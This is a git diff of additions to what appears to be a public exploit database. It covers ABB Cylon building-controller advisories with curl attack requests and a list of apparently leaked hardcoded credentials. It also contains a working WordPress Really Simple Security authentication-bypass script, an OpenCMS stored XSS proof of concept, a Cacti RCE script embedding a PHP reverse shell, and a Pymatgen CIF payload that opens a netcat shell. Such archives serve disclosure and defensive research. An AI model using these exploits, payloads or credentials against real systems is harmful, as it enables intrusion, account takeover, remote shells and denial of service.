+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ cat secrets.txt + +- SynchronizedSecurityServicesHandler.class -> CrET8MEbraME4ahu +- MapInvisibleSchedule.class -> calendar:user +- WDSupervisor.class -> aamservletuser:kakideco +- AESCipher2.class -> uajo4nzibb$#1E4V5262b17f-c3d5-4190-a442-6d251f9da52b +- AESCipher.class -> default +- BrokerURL.class -> aamuser:default +- Schedule.class -> calendar:user +- BfUtils.class -> CrET8MEbraME4ahu +- Context.class -> \037jchabucos:friske +- Db.class -> matrixac1:aam \ No newline at end of file diff --git a/exploits/php/hardware/52218.txt b/exploits/php/hardware/52218.txt new file mode 100644 index 000000000..348ee2608 --- /dev/null +++ b/exploits/php/hardware/52218.txt @@ -0,0 +1,119 @@ +ABB Cylon Aspect 3.08.02 (escDevicesUpdate.php) Off-by-One Config Write DoS + + +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.08.02 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: A vulnerability was identified in a PHP script where an off-by-one +error in array access could lead to undefined behavior and potential DoS. +The issue arises in a loop that iterates over an array using a < condition, +allowing access to an out-of-bounds index. This can trigger errors or unexpected +behavior when processing data, potentially crashing the application. Successful +exploitation of this vulnerability can lead to a crash or disruption of service, +especially if the script handles large data sets. This issue can be triggered +via the rowCount POST parameter in the Electronic Security Control device update +script. + +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5902 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5902.php +CVE ID: CVE-2024-48844 +CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48844 + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ curl http://192.168.73.31/escDevicesUpdate.php \ +> -H "Cookie: PHPSESSID=xxx" \ +> -d "rowCount=2511531337&\ +> escid1=192.168.1.1&\ +> remove1=0&\ +> escid2=192.168.1.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&\ +> remove2=0&\ +> etc. +> etc. + + +$ cat escDevicesUpdate.php +... +... +$ini = INI::read($comproperties); + +unset($ini['comm']['esc-ip-addr']); + +$rowCount = $_POST['rowCount']; + +for ($i = 1; $i < $rowCount; $i++) { + $fieldEscid = "escid" . $i; + $fieldRemove = "remove" . $i; + if ($_POST[$fieldRemove] != 1) { + $escid = trim($_POST[$fieldEscid]); + $ini['comm']['esc-ip-addr'][$i] = $escid; + } +} + +if (!INI::write($comproperties, $ini)) { + logWarning("ESC device listt modification FAILED"); + $myLine = __LINE__; + errorCall($myLine); +} +... \ No newline at end of file diff --git a/exploits/php/hardware/52219.txt b/exploits/php/hardware/52219.txt new file mode 100644 index 000000000..e0fb9b94e --- /dev/null +++ b/exploits/php/hardware/52219.txt @@ -0,0 +1,100 @@ +ABB Cylon Aspect 3.08.02 (webServerUpdate.php) Input Validation Config Poisoning +Vendor: ABB Ltd. +Product web page: https://www.global.abb +Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio + Firmware: <=3.08.02 + +Summary: ASPECT is an award-winning scalable building energy management +and control solution designed to allow users seamless access to their +building data through standard building protocols including smart devices. + +Desc: The ABB BMS/BAS controller suffers from improper input validation on +the port POST parameter in the webServerUpdate.php script. This input is not +validated on the server side and relies on bypassable client-side checks using +the inString.js script to verify that the port parameter contains only characters +from the set (0123456789). Attackers can bypass these checks and supply arbitrary +integer values. Exploitation of this issue can result in configuration poisoning, +Denial of Service (DoS) through malformed configurations, or manipulation of +server settings via Cross-Site Request Forgery (CSRF) combined with authentication +bypass. + +Tested on: GNU/Linux 3.15.10 (armv7l) + GNU/Linux 3.10.0 (x86_64) + GNU/Linux 2.6.32 (x86_64) + Intel(R) Atom(TM) Processor E3930 @ 1.30GHz + Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz + PHP/7.3.11 + PHP/5.6.30 + PHP/5.4.16 + PHP/4.4.8 + PHP/5.3.3 + AspectFT Automation Application Server + lighttpd/1.4.32 + lighttpd/1.4.18 + Apache/2.2.15 (CentOS) + OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64) + OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode) + ErgoTech MIX Deployment Server 2.0.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5901 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5901.php + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ curl http://192.168.73.31/webServerUpdate.php \ +> -d "port=9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999" \ +> -H "Cookie: PHPSESSID=xxx" + + + The ABB Group + + + + + + + + +
+ Web Server settings have been successfully updated.

Please go to //192.168.73.31:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/ to continue.
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/52207.py b/exploits/php/webapps/52207.py new file mode 100755 index 000000000..4fc262c36 --- /dev/null +++ b/exploits/php/webapps/52207.py @@ -0,0 +1,124 @@ +#!/usr/bin/env python3 + +# Exploit Title: Really Simple Security 9.1.1.1 - Authentication Bypass +# Date: 2024-11-19 +# Exploit Author: Antonio Francesco Sardella +# Vendor Homepage: https://really-simple-ssl.com/ +# Software Link: https://really-simple-ssl.com/ +# Version: Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 +# Tested on: 'WordPress 6.7.0' in Docker container (vulnerable application), 'Ubuntu 24.04.1 LTS' with 'Python 3.12.3' (script execution) +# CVE: CVE-2024-10924 +# Category: WebApps +# Repository: https://github.com/m3ssap0/wordpress-really-simple-security-authn-bypass-exploit +# Vulnerability discovered and reported by: István Márton + +# This is a Python3 program that exploits Really Simple Security < 9.1.2 authentication bypass vulnerability. + +# This makes it possible for unauthenticated attackers to log in as any existing user on the site, +# such as an administrator, when the "Two-Factor Authentication" setting is enabled (disabled by default). + +# https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass +# https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl + +# DISCLAIMER: This tool is intended for security engineers and appsec people for security assessments. +# Please use this tool responsibly. I do not take responsibility for the way in which any one uses +# this application. I am NOT responsible for any damages caused or any crimes committed by using this tool. + +import argparse +import json +import logging +import random +import requests +import string +import validators + +from requests.auth import HTTPBasicAuth + +VERSION = "v1.0 (2024-11-19)" +DEFAULT_LOGGING_LEVEL = logging.INFO + +def parse_arguments(): + parser = argparse.ArgumentParser( + description=f"Exploit for Really Simple Security < 9.1.2 authentication bypass vulnerability (CVE-2024-10924). - {VERSION}" + ) + parser.add_argument("-t", "--target", + required=True, + help="URL of the target WordPress") + parser.add_argument("-uid", "--user-id", + required=False, + default=1, + help="Victim user ID (1 is usually the admin).") + parser.add_argument("-v", "--verbose", + action="store_true", + required=False, + default=False, + help="verbose mode") + return parser.parse_args() + +def validate_input(args): + try: + validators.url(args.target) + except validators.ValidationFailure: + raise ValueError("Invalid target URL!") + + try: + if int(args.user_id) < 1: + raise ValueError("Invalid user ID!") + except ValueError: + raise ValueError("Invalid user ID!") + +def send_request(url, user_id): + logging.info("Sending request to target WordPress.") + + target_endpoint = f"{url}" + if not target_endpoint.endswith("/"): + target_endpoint = f"{target_endpoint}/" + target_endpoint = f"{target_endpoint}?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" + + headers = { + "Content-Type": "application/json", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36", + } + + body = { + "user_id": int(user_id), + "login_nonce": "".join(random.choices(string.digits, k=10)), + "redirect_to": "/wp-admin/" + } + logging.debug(f"Body: {body}") + + try: + r = requests.post(target_endpoint, headers=headers, json=body , verify=False) + logging.info(f"Request sent to target WordPress (HTTP {r.status_code}).") + except Exception as e: + logging.fatal("Error in contacting the target WordPress.") + logging.fatal(e) + return + + if r.status_code == 200 and r.headers["Set-Cookie"] is not None and "redirect_to" in r.text and "=deleted;" not in r.headers["Set-Cookie"]: + logging.info(f"Cookie received:\n---------------------\n{r.headers["Set-Cookie"]}\n---------------------") + else: + logging.fatal("Wrong response received from the target WordPress.") + logging.debug(f"Cookie and body received:\n---------------------\n{r.headers["Set-Cookie"]}\n---------------------\n{r.text}\n---------------------") + +def main(): + args = parse_arguments() + logging_level = DEFAULT_LOGGING_LEVEL + if args.verbose: + logging_level = logging.DEBUG + logging.basicConfig(level=logging_level, format="%(asctime)s - %(levelname)s - %(message)s") + + validate_input(args) + target = args.target.strip() + user_id = int(args.user_id) + logging.info(f"Exploit for Really Simple Security < 9.1.2 authentication bypass vulnerability (CVE-2024-10924). - {VERSION}") + logging.debug("Parameters:") + logging.debug(f" target = {target}") + logging.debug(f" user_id = {user_id}") + + send_request(target, user_id) + + logging.info("Finished.") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/52209.txt b/exploits/php/webapps/52209.txt new file mode 100644 index 000000000..114f84052 --- /dev/null +++ b/exploits/php/webapps/52209.txt @@ -0,0 +1,42 @@ +# Exploit Title: OpenCMS 17.0 - Stored Cross Site Scripting (XSS) +# Date: 24-11-2024 +# Exploit Author: Siddhartha Naik +# Vendor Homepage: http://www.opencms.org/en/ +# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=dade528f-ec17-11ee-ab97-7fde8b0295e1 +# Affected Version: 17.0 +# Category: WebApps +# Tested on: Windows 11 +# CVE : CVE-2024-41447 + +1. Vendor Description: + +OpenCms from Alkacon Software is a professional, easy to use website +content management system. OpenCms helps content managers worldwide to +create and maintain beautiful websites fast and efficiently. + +2. Technical Description: + +This is a Stored XSS vulnerability in the author field seen when publishing an article. + This vulnerability has been tested on latest versions of Brave and Firefox browsers. + It is believed to affect any user who clicks on the "Read More" button of the affected article and + can be exploited by any user who is able to modify/create articles. + +3. Proof Of Concept: + +a) Start by creating a new article. In the author field write your script like so: + + + +b) Save and publish the article +c) The user who clicks on the read more button gets a popup saying '1' + +4. Solution: + +Upgrade to latest release. +http://www.opencms.org/en/home/news.html + +5. Reference: +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-41447 +https://github.com/Sidd545-cr/CVE/blob/main/CVE-2024-41447%20-%20Stored%20XSS%20in%20author%20field.pdf +http://alkacon.com +http://opencms.com \ No newline at end of file diff --git a/exploits/php/webapps/52225.txt b/exploits/php/webapps/52225.txt new file mode 100644 index 000000000..db887daee --- /dev/null +++ b/exploits/php/webapps/52225.txt @@ -0,0 +1,311 @@ +# Exploit Title: Cacti 1.2.26 - Remote Code Execution (RCE) (Authenticated) +# Date: 06/01/2025 +# Exploit Author: D3Ext +# Vendor Homepage: https://cacti.net/ +# Software Link: https://github.com/Cacti/cacti/archive/refs/tags/release/1.2.26.zip +# Version: 1.2.26 +# Tested on: Kali Linux 2024 +# CVE: CVE-2024-25641 + +#!/usr/bin/python3 + +import os +import requests +import base64 +import gzip +import time +import argparse +import string +import random +from bs4 import BeautifulSoup +from cryptography.hazmat.primitives import hashes +from cryptography.hazmat.primitives.asymmetric import padding, rsa +from cryptography.hazmat.primitives import serialization + +def get_random_string(length): + letters = string.ascii_lowercase + result_str = ''.join(random.choice(letters) for i in range(length)) + + return result_str + +def check_version(url_to_check): + r = requests.get(url_to_check) + response = r.text + + if "Cacti CHANGELOG" in response and "1.2.26" in response and "1.2.27" not in response: + print("[+] Version seems to be 1.2.26") + else: + print("[-] Version doesn't seem to be 1.2.26, proceeding anyway") + + +# Main function +if __name__ == '__main__': + + p = argparse.ArgumentParser(description="CVE-2024-25641 - Cacti 1.2.26 Authenticated RCE") + p.add_argument('--url', help="URL of the Cacti web root", required=True) + p.add_argument('--user', help="username to log in", required=True) + p.add_argument('--password', help="password of the username", required=True) + p.add_argument('--lhost', help="local host to receive the reverse shell", required=True) + p.add_argument('--lport', help="local port to receive the reverse shell", required=True) + p.add_argument('--verbose', help="enable verbose", action='store_true', default=False, required=False) + + # Parse CLI arguments + parser = p.parse_args() + + url = parser.url + username = parser.user + password = parser.password + lhost = parser.lhost + lport = parser.lport + verbose = parser.verbose + + url = url.rstrip("/") + + print("CVE-2024-25641 - Cacti 1.2.26 Authenticated RCE\n") + + # check if versions match + print("[*] Checking Cacti version...") + time.sleep(0.5) + + check = check_version(url + "/CHANGELOG") + if check == False: + sys.exit(0) + + req = requests.Session() + + if verbose: + print("[*] Capturing CSRF token...") + + r = req.get(url) + + # extract CSRF token + soup = BeautifulSoup(r.text, 'html.parser') + html_parser = soup.find('input', {'name': '__csrf_magic'}) + csrf_token = html_parser.get('value') + + if verbose: + print("[+] CSRF token: " + csrf_token) + + print("[*] Logging in on " + url + "/index.php") + + # define login post data + login_data = { + '__csrf_magic': csrf_token, + 'action': 'login', + 'login_username': username, + 'login_password': password, + 'remember_me': 'on' + } + + # send login request + r = req.post(url + "/index.php", data=login_data) + + # check success + if 'Logged in' in r.text: + print("[+] Successfully logged in as " + username) + else: + print("[-] An error has ocurred while logging in as " + username) + sys.exit(0) + + # generate random filename + random_name = get_random_string(10) + random_filename = random_name + ".php" + + payload = """ array("pipe", "r"), // stdin is a pipe that the child will read from + 1 => array("pipe", "w"), // stdout is a pipe that the child will write to + 2 => array("pipe", "w") // stderr is a pipe that the child will write to +); + +$process = proc_open($shell, $descriptorspec, $pipes); + +if (!is_resource($process)) { + printit("ERROR: Can't spawn shell"); + exit(1); +} + +stream_set_blocking($pipes[0], 0); +stream_set_blocking($pipes[1], 0); +stream_set_blocking($pipes[2], 0); +stream_set_blocking($sock, 0); + +printit("Successfully opened reverse shell to $ip:$port"); + +while (1) { + if (feof($sock)) { + printit("ERROR: Shell connection terminated"); + break; + } + if (feof($pipes[1])) { + printit("ERROR: Shell process terminated"); + break; + } + + $read_a = array($sock, $pipes[1], $pipes[2]); + $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); + + // If we can read from the TCP socket, send + // data to process's STDIN + if (in_array($sock, $read_a)) { + if ($debug) printit("SOCK READ"); + $input = fread($sock, $chunk_size); + if ($debug) printit("SOCK: $input"); + fwrite($pipes[0], $input); + } + + if (in_array($pipes[1], $read_a)) { + if ($debug) printit("STDOUT READ"); + $input = fread($pipes[1], $chunk_size); + if ($debug) printit("STDOUT: $input"); + fwrite($sock, $input); + } + + if (in_array($pipes[2], $read_a)) { + if ($debug) printit("STDERR READ"); + $input = fread($pipes[2], $chunk_size); + if ($debug) printit("STDERR: $input"); + fwrite($sock, $input); + } +} + +fclose($sock); +fclose($pipes[0]); +fclose($pipes[1]); +fclose($pipes[2]); +proc_close($process); +function printit ($string) { + if (!$daemon) { + print "$string\n"; + } +} + +?>""" + + # generate payload + print("[*] Generating malicious payload...") + + keypair = rsa.generate_private_key(public_exponent=65537, key_size=2048) + public_key = keypair.public_key().public_bytes(encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.SubjectPublicKeyInfo) + file_signature = keypair.sign(payload.encode('utf-8'), padding.PKCS1v15(), hashes.SHA256()) + + b64_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8') + b64_file_signature = base64.b64encode(file_signature).decode('utf-8') + b64_public_key = base64.b64encode(public_key).decode('utf-8') + + data = """ + + + resource/""" + random_filename + """ + """ + b64_payload + """ + """ + b64_file_signature + """ + + + """ + b64_public_key + """ + +""" + + signature = keypair.sign(data.encode('utf-8'), padding.PKCS1v15(), hashes.SHA256()) + final_data = data.replace("", "" + base64.b64encode(signature).decode('utf-8') + "").encode('utf-8') + + # write gzip data + f = open(random_filename + ".gz", "wb") + f.write(gzip.compress(final_data)) + f.close() + + print("[+] Malicious GZIP: " + random_filename + ".gz") + + # define post data + post_data = { + '__csrf_magic': csrf_token, + 'trust_signer': 'on', + 'save_component_import': 1, + 'action': 'save' + } + + # upload file + print("[*] Uploading GZIP file...") + + # send post request + r = req.post(url + "/package_import.php?package_location=0&preview_only=on&remove_orphans=on&replace_svalues=on", data=post_data, files={'import_file': open(random_filename + ".gz", 'rb')}) + + print("[+] Successfully uploaded GZIP file") + + time.sleep(0.5) + + print("[*] Validating success...") + + soup = BeautifulSoup(r.text, 'html.parser') + html_parser = soup.find('input', {'title': "/var/www/html/cacti/resource/" + random_filename}) + file_id = html_parser.get('id') + + post_data = { + '__csrf_magic': csrf_token, + 'trust_signer': 'on', + 'data_source_profile': 1, + 'remove_orphans': 'on', + 'replace_svalues': 'on', + file_id: 'on', + 'save_component_import': 1, + 'preview_only': '', + 'action': 'save', + } + + r = req.post(url + "/package_import.php?header=false", data=post_data) + + print("[+] Success!") + + time.sleep(0.5) + + print("[*] Triggering reverse shell by sending GET request to " + url + "/resource/" + random_filename) + time.sleep(0.2) + print("[+] Check your netcat listener") + + # remove payload file + os.remove(random_filename + ".gz") + + r = req.get(url + "/resource/" + random_filename) \ No newline at end of file diff --git a/exploits/python/remote/52205.py b/exploits/python/remote/52205.py new file mode 100755 index 000000000..c9e701d98 --- /dev/null +++ b/exploits/python/remote/52205.py @@ -0,0 +1,53 @@ +# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE) +# Google Dork : (not applicable) +# Date : 2024-11-13 +# Exploit Author : Mohammed Idrees Banyamer +# Vendor Homepage : https ://pymatgen.org +# Software Link : https ://pypi.org /project /pymatgen/ +# Version : 2024.1 +# Tested on : Kali Linux 2024.1 +# CVE : CVE-2024-23346 + + +import os + +# Function to create the malicious CIF file +def create_malicious_cif(ip, port): + # Constructing the malicious CIF file with reverse shell payload + malicious_cif = f""" +data_5yOhtAoR +_audit_creation_date 2024-11-13 +_audit_creation_method "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit" + +loop_ +_parent_propagation_vector.id +_parent_propagation_vector.kxkykz +k1 [0 0 0] + +_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0' + +_space_group_magn.number_BNS 62.448 +_space_group_magn.name_BNS "P n' m a' " + """ + + # Save to a file + with open("vuln.cif", "w") as file: + file.write(malicious_cif) + print("[*] Malicious CIF file created: vuln.cif") + +# Function to trigger the exploit by parsing the malicious CIF file +def exploit(): + ip = input("Enter your IP address for the reverse shell: ") + port = input("Enter the port for the reverse shell to listen on: ") + + # Create the malicious CIF file + create_malicious_cif(ip, port) + + # Trigger the Pymatgen CIF parser to parse the malicious file + from pymatgen.io.cif import CifParser + parser = CifParser("vuln.cif") + structure = parser.parse_structures() + +# Running the exploit +if __name__ == "__main__": + exploit() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e98dee863..b896b4947 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5665,6 +5665,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 39418,exploits/java/webapps/39418.txt,"Solr 3.5.0 - Arbitrary Data Deletion",2016-02-08,N37,webapps,java,,2016-02-14,2016-02-14,1,,,,http://www.exploit-db.com/screenshots/idlt39500/captura-de-pantalla-de-2016-02-14-185026.png,http://www.exploit-db.comapache-solr-3.5.0.tgz, 49385,exploits/java/webapps/49385.py,"Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)",2021-01-06,1F98D,webapps,java,,2021-01-06,2021-01-08,1,CVE-2020-10199,,,,, 33687,exploits/java/webapps/33687.txt,"Sparta Systems TrackWise EQms - Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",webapps,java,,2010-03-02,2014-06-09,1,,,,,,https://www.securityfocus.com/bid/38483/info +52206,exploits/java/webapps/52206.py,"Spring Boot common-user-management 0.1 - Remote Code Execution (RCE)",2025-04-15,d3sca,webapps,java,,2025-04-15,2025-04-15,0,CVE-2024-52302,,,,,https://github.com/d3sca/CVE-2024-52302 51577,exploits/java/webapps/51577.py,"Spring Cloud 3.2.2 - Remote Command Execution (RCE)",2023-07-11,GatoGamer1155,webapps,java,,2023-07-11,2023-07-11,0,CVE-2022-22963,,,,, 46772,exploits/java/webapps/46772.rb,"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)",2019-04-30,"Dhiraj Mishra",webapps,java,8888,2019-04-30,2019-04-30,0,CVE-2019-3799,"Metasploit Framework (MSF)",,,, 46772,exploits/java/webapps/46772.rb,"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)",2019-04-30,"Dhiraj Mishra",webapps,java,8888,2019-04-30,2019-04-30,0,CVE-2019-3799,Traversal,,,, @@ -10397,7 +10398,14 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 3851,exploits/multiple/dos/3851.c,"ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-Sébastien,dos,multiple,,2007-05-03,2017-10-07,1,CVE-2007-1669,,,,, 42294,exploits/multiple/dos/42294.py,"Zookeeper 3.5.2 Client - Denial of Service",2017-07-02,"Brandon Dennis",dos,multiple,2181,2017-07-04,2017-10-04,0,CVE-2017-5637,,,,, 32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",dos,multiple,,2008-11-12,2014-03-30,1,CVE-2008-5102;OSVDB-50487,,,,,https://www.securityfocus.com/bid/32267/info +52221,exploits/multiple/hardware/52221.txt,"ABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-48845,,,,, +52217,exploits/multiple/hardware/52217.txt,"ABB Cylon Aspect 3.08.02 (bbmdUpdate.php) - Remote Code Execution",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-6516;CVE-2024-51550;CVE-2024-48839,,,,, +52214,exploits/multiple/hardware/52214.txt,"ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) - Stored Cross-Site Scripting",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-6516,,,,, +52215,exploits/multiple/hardware/52215.txt,"ABB Cylon Aspect 3.08.02 (licenseUpload.php) - Stored Cross-Site Scripting",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-6516,,,,, +52216,exploits/multiple/hardware/52216.txt,"ABB Cylon Aspect 3.08.02 (uploadDb.php) - Remote Code Execution",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-48839,,,,, +52224,exploits/multiple/hardware/52224.txt,"ABB Cylon Aspect 3.08.02 - Cookie User Password Disclosure",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,CVE-2024-51546,,,,, 52182,exploits/multiple/hardware/52182.txt,"ABB Cylon Aspect 3.08.02 - PHP Session Fixation",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,,,,,, +52220,exploits/multiple/hardware/52220.txt,"ABB Cylon Aspect 3.08.03 (CookieDB) - SQL Injection",2025-04-15,LiquidWorm,hardware,multiple,,2025-04-15,2025-04-15,0,,,,,, 52180,exploits/multiple/hardware/52180.txt,"ABB Cylon FLXeon 9.3.4 - Cross-Site Request 